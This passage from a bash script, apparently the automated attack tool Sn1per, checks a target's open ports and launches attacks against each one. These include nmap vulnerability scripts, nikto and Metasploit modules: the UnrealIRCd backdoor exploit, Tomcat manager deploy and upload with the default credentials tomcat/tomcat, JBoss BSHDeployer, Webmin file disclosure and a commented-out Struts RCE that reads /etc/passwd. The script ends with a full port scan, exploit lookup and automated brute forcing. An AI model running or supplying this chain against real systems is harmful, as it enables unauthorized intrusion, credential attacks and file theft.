1463 |   nmap -A -sV  -T5 --script=vnc* -p 5900 $TARGET
1464 | fi
1465 | 
1466 | if [ -z "$port_5984" ];
1467 | then
1468 |   echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
1469 | else
1470 |   echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
1471 |   nmap -A -sV -Pn -T5 --script=couchdb* -p 5984 $TARGET
1472 |   msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
1473 | fi
1474 | 
1475 | if [ -z "$port_6000" ];
1476 | then
1477 |   echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
1478 | else
1479 |   echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
1480 |   nmap -A -sV -Pn -T5 --script=x11* -p 6000 $TARGET
1481 |   msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
1482 | fi
1483 | 
1484 | if [ -z "$port_6667" ];
1485 | then
1486 |   echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
1487 | else
1488 |   echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
1489 |   nmap -A -sV -Pn -T5 --script=irc* -p 6667 $TARGET
1490 |   msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
1491 | fi
1492 | 
1493 | if [ -z "$port_8000" ];
1494 | then
1495 |   echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET"
1496 | else
1497 |   echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET"
1498 |   wafw00f http://$TARGET:8000
1499 |   echo ""
1500 |   whatweb http://$TARGET:8000
1501 |   echo ""
1502 |   xsstracer $TARGET 8000
1503 |   cd ..
1504 |   nikto -h http://$TARGET:8000
1505 |   if [ ${DISTRO} == "blackarch"  ]; then
1506 |     /bin/CutyCapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
1507 |   else
1508 |     cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
1509 |   fi
1510 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
1511 | fi
1512 | 
1513 | if [ -z "$port_8100" ];
1514 | then
1515 |   echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET"
1516 | else
1517 |   echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET"
1518 |   wafw00f http://$TARGET:8100
1519 |   echo ""
1520 |   whatweb http://$TARGET:8100
1521 |   echo ""
1522 |   xsstracer $TARGET 8100
1523 |   sslscan --no-failed $TARGET:8100
1524 |   cd $PLUGINS_DIR/MassBleed
1525 |   ./massbleed $TARGET port 8100
1526 |   cd $INSTALL_DIR
1527 |   nikto -h http://$TARGET:8100
1528 |   if [ ${DISTRO} == "blackarch"  ]; then
1529 |     /bin/CutyCapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
1530 |   else
1531 |     cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
1532 |   fi
1533 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
1534 | fi
1535 | 
1536 | if [ -z "$port_8080" ];
1537 | then
1538 |   echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET"
1539 | else
1540 |   echo -e "$OKORANGE + -- --=[Port 8080 opened... running tests...$RESET"
1541 |   wafw00f http://$TARGET:8080
1542 |   echo ""
1543 |   whatweb http://$TARGET:8080
1544 |   echo ""
1545 |   xsstracer $TARGET 8080
1546 |   sslscan --no-failed $TARGET:8080
1547 |   cd $PLUGINS_DIR/MassBleed
1548 |   ./massbleed $TARGET port 8080
1549 |   cd $INSTALL_DIR
1550 |   nikto -h http://$TARGET:8080
1551 |   if [ ${DISTRO} == "blackarch"  ]; then
1552 |     /bin/CutyCapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
1553 |   else
1554 |     cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
1555 |   fi
1556 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
1557 |   msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
1558 |   # EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
1559 |   # msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
1560 | fi
1561 | 
1562 | if [ -z "$port_8180" ];
1563 | then
1564 |   echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET"
1565 | else
1566 |   echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET"
1567 |   wafw00f http://$TARGET:8180
1568 |   echo ""
1569 |   whatweb http://$TARGET:8180
1570 |   echo ""
1571 |   xsstracer $TARGET 8180
1572 |   sslscan --no-failed $TARGET:8180
1573 |   sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180
1574 |   cd $PLUGINS_DIR/MassBleed
1575 |   ./massbleed $TARGET port 8180
1576 |   cd $INSTALL_DIR
1577 |   nikto -h http://$TARGET:8180
1578 |   if [ ${DISTRO} == "blackarch"  ]; then
1579 |     /bin/CutyCapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
1580 |   else
1581 |     cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
1582 |   fi
1583 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
1584 |   echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
1585 |   msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
1586 |   echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
1587 |   msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
1588 | fi
1589 | 
1590 | if [ -z "$port_8443" ];
1591 | then
1592 |   echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET"
1593 | else
1594 |   echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET"
1595 |   wafw00f http://$TARGET:8443
1596 |   echo ""
1597 |   whatweb http://$TARGET:8443
1598 |   echo ""
1599 |   xsstracer $TARGET 8443
1600 |   sslscan --no-failed $TARGET:8443
1601 |   sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443
1602 |   cd $PLUGINS_DIR/MassBleed
1603 |   ./massbleed $TARGET port 8443
1604 |   cd $INSTALL_DIR
1605 |   nikto -h https://$TARGET:8443
1606 |   if [ ${DISTRO} == "blackarch"  ]; then
1607 |     /bin/CutyCapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
1608 |   else
1609 |     cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
1610 |   fi
1611 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
1612 | fi
1613 | 
1614 | if [ -z "$port_8888" ];
1615 | then
1616 |   echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET"
1617 | else
1618 |   echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET"
1619 |   wafw00f http://$TARGET:8888
1620 |   echo ""
1621 |   whatweb http://$TARGET:8888
1622 |   echo ""
1623 |   xsstracer $TARGET 8888
1624 |   nikto -h http://$TARGET:8888
1625 |   if [ ${DISTRO} == "blackarch"  ]; then
1626 |     /bin/CutyCapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
1627 |   else
1628 |     cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
1629 |   fi
1630 |   nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse  -A -p 8888 -T5 $TARGET
1631 | fi
1632 | 
1633 | if [ -z "$port_10000" ];
1634 | then
1635 |   echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET"
1636 | else
1637 |   echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET"
1638 |   echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
1639 |   echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
1640 |   msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
1641 | fi
1642 | 
1643 | if [ -z "$port_16992" ];
1644 | then
1645 |   echo -e "$OKRED + -- --=[Port 16992 closed... skipping.$RESET"
1646 | else
1647 |   echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
1648 |   amap $TARGET 16992 -A
1649 |   nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
1650 | fi
1651 | 
1652 | if [ -z "$port_27017" ];
1653 | then
1654 |   echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
1655 | else
1656 |   echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
1657 |   nmap -sV -p 27017 -Pn -T5 --script=mongodb* $TARGET
1658 | fi
1659 | 
1660 | if [ -z "$port_27018" ];
1661 | then
1662 |   echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
1663 | else
1664 |   echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
1665 |   nmap -sV  -p 27018 -Pn -T5 --script=mongodb* $TARGET
1666 | fi
1667 | 
1668 | if [ -z "$port_27019" ];
1669 | then
1670 |   echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
1671 | else
1672 |   echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
1673 |   nmap -sV  -p 27019 -Pn -T5 --script=mongodb* $TARGET
1674 | fi
1675 | 
1676 | if [ -z "$port_28017" ];
1677 | then
1678 |   echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
1679 | else
1680 |   echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
1681 |   nmap -sV  -p 28017 -Pn -T5 --script=mongodb* $TARGET
1682 | fi
1683 | 
1684 | if [ -z "$port_49152" ];
1685 | then
1686 |   echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
1687 | else
1688 |   echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET"
1689 |   $SUPER_MICRO_SCAN $TARGET
1690 | fi
1691 | 
1692 | echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
1693 | if [ ${DISTRO} == "blackarch" ]; then
1694 |   /bin/yasuo -r $TARGET -b all
1695 | else
1696 |   cd $PLUGINS_DIR/yasuo
1697 |   ruby yasuo.rb -r $TARGET -b all
1698 | fi
1699 | cd $SNIPER_DIR
1700 | 
1701 | if [ "$FULLNMAPSCAN" = "0" ]; then
1702 |   echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
1703 | else
1704 |   echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
1705 |   nmap -Pn -T4 -sV  -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
1706 |   echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +$RESET"
1707 |   searchsploit -v --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
1708 | fi
1709 | 
1710 | if [ "$AUTOBRUTE" = "0" ]; then
1711 |   echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
1712 | else
1713 |   echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET"
1714 |   brutex $TARGET
1715 |   cd $INSTALL_DIR
1716 |   rm -f hydra.restore
1717 |   rm -f scan.log
1718 |   echo ""
1719 | fi
1720 | 
1721 | rm -f $LOOT_DIR/.fuse_* 2> /dev/null
1722 | 
1723 | echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
1724 | exit 0
1725 | 


--------------------------------------------------------------------------------